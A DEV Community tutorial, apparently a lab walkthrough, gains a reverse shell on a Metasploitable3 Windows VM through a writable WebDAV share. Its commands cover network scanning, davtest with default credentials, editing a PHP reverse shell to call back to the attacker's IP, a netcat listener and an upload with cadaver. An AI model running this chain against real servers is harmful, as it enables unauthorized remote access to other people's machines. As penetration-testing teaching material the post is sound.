DEV Community

Cover image for Reverse Shell on MetaSploitable3 Windows
ANDGOEDU
ANDGOEDU

Posted on

Reverse Shell on MetaSploitable3 Windows

In-Depth Steps for WebDAV Exploitation

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.

Information Gathering

Step 0: Check Router IP from eth0 on your Kali Machine

ip addr
Enter fullscreen mode Exit fullscreen mode

Example Results:

inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
Enter fullscreen mode Exit fullscreen mode

Step 1: Quick arp-scan

arp-scan 192.168.1.1/24
Enter fullscreen mode Exit fullscreen mode

Example Results:

192.168.1.3     02:f9:8e:69:9e:55       (Unknown: locally administered)
192.168.1.1     e0:19:54:46:e5:6e       zte corporation
192.168.1.11    08:00:27:e7:c3:e8       PCS Systemtechnik GmbH
Enter fullscreen mode Exit fullscreen mode

Step 2: Nmap Scan for All Ports and OS Detection

nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt
Enter fullscreen mode Exit fullscreen mode

Example Results:

Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1

// Also the open port 8585 for the WebDav 
PORT     STATE SERVICE REASON         VERSION
8585/tcp open  unknown syn-ack ttl 64
Enter fullscreen mode Exit fullscreen mode

Nmap scan report for 192.168.1.11:

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
TCP/IP fingerprint:
Enter fullscreen mode Exit fullscreen mode

Step 3: Davtest for WebDAV

davtest -auth admin:password -sendbd -auto -url http://192.168.1.11:8585/uploads
Enter fullscreen mode Exit fullscreen mode

Example Results:

Testing DAV connection
OPEN            SUCCEED:                http://192.168.1.11:8585/uploads
Enter fullscreen mode Exit fullscreen mode

WebDAV Exploitation

Step 4: Copy PHP Reverse Shell to Desktop

cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
Enter fullscreen mode Exit fullscreen mode

Step 5: Edit PHP Reverse Shell

Edit /home/kali/Desktop/php-reverse-shell.php:

$ip = '192.168.1.10';  // Kali machine IP
$port = 7779;           // TCP/UDP Port
$shell = 'cmd.exe';     // Use cmd.exe for Windows
Enter fullscreen mode Exit fullscreen mode

Step 6: Start Netcat Listener on Kali

nc -lvnp 7779
Enter fullscreen mode Exit fullscreen mode

Step 7: Upload PHP Reverse Shell Using Cadaver

cadaver http://192.168.1.11:8585/uploads
dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php
Enter fullscreen mode Exit fullscreen mode

Step 8: Check Netcat Listener for Shell

nc -lnvp 7779
Enter fullscreen mode Exit fullscreen mode

Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.

Explanation:

  1. Information Gathering:

    • Step 0: Check the router IP to identify the local network's subnet.
    • Step 1: Use arp-scan to discover active hosts on the network.
    • Step 2: Perform an Nmap scan to find open ports and detect the operating system.
  2. WebDAV Exploitation:

    • Step 3: Use davtest to verify that the WebDAV service is accessible.
    • Step 4: Copy a PHP reverse shell script to the attacker's machine.
    • Step 5: Edit the PHP script with the attacker's IP and desired port.
    • Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
    • Step 7: Upload the modified PHP script to the target using Cadaver.
    • Step 8: Check the Netcat listener for a successful reverse shell.

Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.

Top comments (0)